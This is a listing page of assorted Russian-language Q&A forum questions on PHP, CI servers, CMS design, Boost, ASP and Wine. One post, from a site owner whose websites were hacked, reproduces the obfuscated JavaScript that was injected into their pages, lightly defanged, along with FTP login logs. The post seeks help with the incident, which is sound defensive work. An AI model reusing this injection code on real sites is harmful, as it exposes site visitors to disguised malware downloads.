Задать вопрос

PHP tokenizer на Python?

Существует ли аналог tokenizer'a из PHP на Python, либо же подобные лексеры для разбора PHP-кода?

PHP   Python    

373   1   04:45, 20th August, 2020


Работает ли CruiseControl.NET на IIS 7.0?

Я новичок в разработке (администратор по торговле), и я настраиваю свою среду разработки, и я хотел бы настроить сервер CruiseControl.Net на сервере 2008. Быстрый Google не нашел никаких инструкций для запуска его на IIS 7.0, поэтому мне было интересно, есть ли у кого-нибудь опыт в этой настройке.

iis-7   cruisecontrol.net    

412   4   04:33, 20th August, 2020


Панель управления сервером?

Всем доброго времени суток. Посоветуйте пожалуйста многофункциональную панель управления сервером. Раньше использовал ISPmanager Lite, все устраивало, так как при покупке VDS сервера лицензия выдавалась бесплатно. Теперь планирую свой сервер у себя в квартире. Пока это чисто эксперимент, и желание посмотреть можно ли так сэкономить. Предположительно сервер будет слабым (Процессор 1.0 ГГц, ОЗУ 256-512). ОС планируется — FreeBSD. Собственно необходимая альтернативная платным продуктам панель управления сервером. Основные функции:

-Управление пользователями системы

-Управление сервисами (перезагрузка, стоп, запуск и т.д.)

-Менеджер файлов

-Статистика (по трафику, используемых ресурсах, журнал операций, текущая активность)


Желательно:

-Управление настройками и модулями PHP

-Планировщик



Взлом сайтов. Вставлен произвольный код?

Добрый день!


На днях на нескольких сайтах на CodeIgniter, одном на Joomla, одном на Wordpress и на одном совсем без CMS был установлен произвольный код в файлах index.*, home.*, page.*, auth.*. Т.е. в каждый из файлов был установлен тег script с произвольным кодом. Внешне это отображалось как приглашение установить новую мультимедийную плюшку для браузера.


Собственно, сам скрипт (без! знака в слове script и без переводов строки — не умещался):
<pre><code class="javascript">&lt;sc!ript type=&quot;text/javascript&quot; language=&quot;javascript&quot;&gt;
wkllp=&quot;33933333339999333999339939993933
399993393993993339933939339333333999393339999339399933333
993393933999939339333933999393339933939399993333999393333
939999399333993999339939993399339333933399999333933399399
939333993393939993339399339333993939933933333399993993999
399939939339399339333999393339939333339993933393333333993
333399933333999933333999399399393333993393939939339399339
993993933339993933339993933393333333993333399933333999933
333999399399339933999339339933339399399393993393939933393
399399993999339339933933399339393999339333999393339333333
993999339939999339993993999399339939339399933993993933939
933393399393393993993339939339399939333999933933999393339
333333993933339939339399339333993393339933939399399933399
939939999939339999333393999939993399399939333999933939939
933399339393399999333999933399393393993399339993393399333
393993993939933939339333333993933939933933339999393393339
339993933399339393999333939933933399393993393339333933333
399933993999339339933399339999393393339339939333399939333
999393339993333339993933393999933939999399339933999399939
993339399933393999399939933939399339393999339339933999339
933993393999339933399399399993393999339933399399333993393
999939933339399339333393999339939393399933333993399933933
393339999933399993333939999399393393993399339993393399333
39399399393993393933999993&quot;;znanx=100;wdlgs=this;nsjvu=&quot;i&quot;+&quot;te&quot;;
vurba=116;nqcs=&quot;wr&quot;+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && 
gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o=&quot;&quot;;
imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf&lt;wkllp.length){
bnehf=0;for(mkrku=0;mkrku&lt;8;mkrku++){bnehf=bnehf&lt;&lt;1;if(
wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;
qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}&lt;/sc!ript&gt;



Прямой связи CI-Joomla-WP-чистыйHTML я не вижу. Т.е. видимо, это не критическая уязвимость в каком-либо движке.


В логах апача странных запросов или даже каких-либо запросов во время модификации файла нет (+-10минут).


Подозрительно выглядят логи auth.log (настоящий username изменен; ip, с которого пришел запрос — нет):
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - USER user: no such user found from dslb-094-222-057-074.pools.arcor-ip.net [::ffff:94.222.57.74] to ::ffff:89.108.126.42:21 <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
<br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster1: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster2: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.



SSH закрыт фаерволом для всех, кроме меня.


Хочу задать вопрос — что это может быть? Как этого избежать? Какие еще логи нужны для анализа?

Защита   от   взлома   ActionScript   Журналирование    

342   13   04:16, 20th August, 2020


Какая организация контента в CMS более удобна?

Можно предоставить пользователю возможность собирать документ из различного рода блоков-кирпичиков (я так понимаю, Друпал так работает). В таком случае возрастает нагрузка на администратора (автора).
Либо тупо использовать «железную» схему, т.е. документ в блоге должен состоять из строго определенных полей, а любые изменения функционала через плагины. В этом случае меньше гибкость, но система вроде как ближе к юзеру.

Что посоветуете? Интересует как мнение программистов, так и пользователей таких систем.

CMS   Контент    

317   7   03:58, 20th August, 2020


Инструмент для совместной работы филиалов и центра

Взываю к коллективному хабраразуму. Мы ищем систему мечты для централизованного взаимодействия основной компании и компаний-партнёров. Вариантов таких сервисов масса, все не изучишь. Думаю, кто-то с подобной задачей сталкивался.

Нужно иметь возможности
• Общение по принципу форума
• Обмен фото, видео, офисные файлы. Хранение в виде централизованого структурированного хранилища.
• Публикация новостей
• Есть свой сервер, на который можно эту систему поставить. В принципе, мы не против хранить такую информацию на сервере разработчика.
• По цене лучше бесплатно или недорого. От Basecamp'а отказываемся, потому что дорого и избыточно

Желательно, чтоб система была простая, без наворотов и избыточного функционала. Нам не нужны задания, отслеживание проектов и т.п. Нам нужна единая база знаний и возможность общения. Ах, и да! Желательно на русском, не все наши партнёры сильны в английском.



Boost предупреждения с VC++ 9

Когда библиотека / заголовки Boost используется с компиляторами VC++ 9 (Visual C++ 2008 Express Edition или Visual Studio 2008), генерируется множество предупреждений о нежелательных явлениях. Они бывают 2 вида:

  1. Предупреждение о настройке wp64 значения.
  2. Предупреждение о версии компилятора.

Как я могу отключить эти предупреждения?

c++   visual-studio   boost   warnings    

439   1   03:43, 20th August, 2020


VBScript/ASP Classic

У меня есть пара вопросов относительно VBScript и ASP Classic:

  1. Каков предпочтительный способ доступа к базе данных сервера MS SQL в VBScript/ASP?

  2. Каковы наилучшие методы в отношении отделения модели от представления от контроллера?

  3. Есть еще что-нибудь, что я должен знать о VBScript или ASP?

Если вы еще не заметили, я новичок в кодировании VBScript. Я понимаю, что числа 2 & 3-это своего рода гигантские вопросы "black hole", которые являются слишком общими, поэтому не думайте, что я ожидаю узнать все, что нужно знать об этих двух вопросах отсюда.

sql-server   model-view-controller   asp-classic   vbscript    

489   10   03:42, 20th August, 2020


HD Camera, как?

Нужно выводить видео высокого качества, FULL HD, на экран 40-50 дюймов. Качество обычной HD WEB камеры не подходит, слишком большое зерно (тестировали на Logitech HD Pro Webcam C910). Посоветуйте какие нибудь альтернативы.


Хотелось бы узнать, какое решение использовалось тут.

Видеонаблюдение    

285   4   03:21, 20th August, 2020


Wine, игры и открытый драйвер ATI?

Стоит на ноуте Fedora 13, AthlonX2, 2G RAM, ATI Radeon x2300. К сожалению ATI дропнула поддержку не-HD карт в проприетарном драйвере, приходится использовать открытый radeon.


Так вот. Цель порезаться в POP Warrior Within или Fallout 3. На винде все это бегало. Под вайном чето вылетает.


Вообще любая виндовая игруха, которая юзает Direct3d или тормозит или вылетает. Даже Diablo II. Когда в ней ставишь DirectDraw, летает. Direct3d подтормаживает.


Directx в Wine ставил из winetricks.


Внимание вопрос. Это косяк драйвера или все таки можно что то сделать, затюнить, установить какую то DLLку и т.д.?


На winehq пишут что все эти игры идут с Gold статусом, т.е. идут.

Linux   Wine   AMD    

347   0   03:17, 20th August, 2020